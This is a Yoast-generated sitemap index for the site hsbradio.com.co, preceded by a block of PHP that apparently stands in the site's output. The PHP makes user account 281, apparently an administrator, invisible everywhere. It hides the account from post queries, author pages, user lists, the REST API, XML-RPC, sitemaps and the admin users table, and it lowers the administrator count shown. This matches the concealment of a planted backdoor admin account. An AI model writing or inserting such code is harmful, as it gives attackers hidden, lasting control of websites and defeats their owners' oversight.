
add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 281;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 281 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 281 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 281;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 281;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 281;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/281(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 281;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-281{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.hsbradio.com.co/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap.xml</loc>
		<lastmod>2026-08-12T04:22:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap2.xml</loc>
		<lastmod>2025-09-28T17:59:52+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap3.xml</loc>
		<lastmod>2025-10-09T06:22:35+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap4.xml</loc>
		<lastmod>2025-10-19T22:05:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap5.xml</loc>
		<lastmod>2025-10-30T22:17:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap6.xml</loc>
		<lastmod>2025-11-09T22:03:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap7.xml</loc>
		<lastmod>2025-11-19T12:31:53+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap8.xml</loc>
		<lastmod>2025-11-30T15:12:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap9.xml</loc>
		<lastmod>2025-12-12T21:44:39+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap10.xml</loc>
		<lastmod>2025-12-26T20:18:32+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap11.xml</loc>
		<lastmod>2026-01-15T20:19:14+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap12.xml</loc>
		<lastmod>2026-02-02T14:57:53+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap13.xml</loc>
		<lastmod>2026-02-16T13:17:08+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap14.xml</loc>
		<lastmod>2026-03-02T14:42:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap15.xml</loc>
		<lastmod>2026-03-15T12:58:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap16.xml</loc>
		<lastmod>2026-03-28T16:17:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap17.xml</loc>
		<lastmod>2026-04-09T18:18:10+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap18.xml</loc>
		<lastmod>2026-04-20T22:06:23+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap19.xml</loc>
		<lastmod>2026-04-30T21:12:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap20.xml</loc>
		<lastmod>2026-05-11T01:57:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap21.xml</loc>
		<lastmod>2026-05-19T22:15:45+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap22.xml</loc>
		<lastmod>2026-05-29T23:35:45+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap23.xml</loc>
		<lastmod>2026-06-08T14:22:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap24.xml</loc>
		<lastmod>2026-06-16T02:45:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap25.xml</loc>
		<lastmod>2026-06-25T02:53:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap26.xml</loc>
		<lastmod>2026-07-03T14:10:27+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap27.xml</loc>
		<lastmod>2026-07-10T04:45:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap28.xml</loc>
		<lastmod>2026-07-17T04:30:27+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap29.xml</loc>
		<lastmod>2026-07-25T16:03:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap30.xml</loc>
		<lastmod>2026-08-01T02:14:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap31.xml</loc>
		<lastmod>2026-08-08T19:39:43+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post-sitemap32.xml</loc>
		<lastmod>2026-08-12T04:22:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/page-sitemap.xml</loc>
		<lastmod>2026-08-11T21:11:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/category-sitemap.xml</loc>
		<lastmod>2026-08-12T04:22:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap.xml</loc>
		<lastmod>2026-08-11T21:35:04+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap2.xml</loc>
		<lastmod>2026-08-11T21:52:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap3.xml</loc>
		<lastmod>2026-08-11T21:52:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap4.xml</loc>
		<lastmod>2026-08-11T21:14:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap5.xml</loc>
		<lastmod>2026-08-11T21:43:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap6.xml</loc>
		<lastmod>2026-08-11T21:25:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap7.xml</loc>
		<lastmod>2026-08-11T21:20:43+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap8.xml</loc>
		<lastmod>2026-08-11T21:43:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap9.xml</loc>
		<lastmod>2026-08-11T21:52:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap10.xml</loc>
		<lastmod>2026-08-11T21:43:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/post_tag-sitemap11.xml</loc>
		<lastmod>2026-08-11T21:00:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.hsbradio.com.co/author-sitemap.xml</loc>
		<lastmod>2026-08-10T19:30:54+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->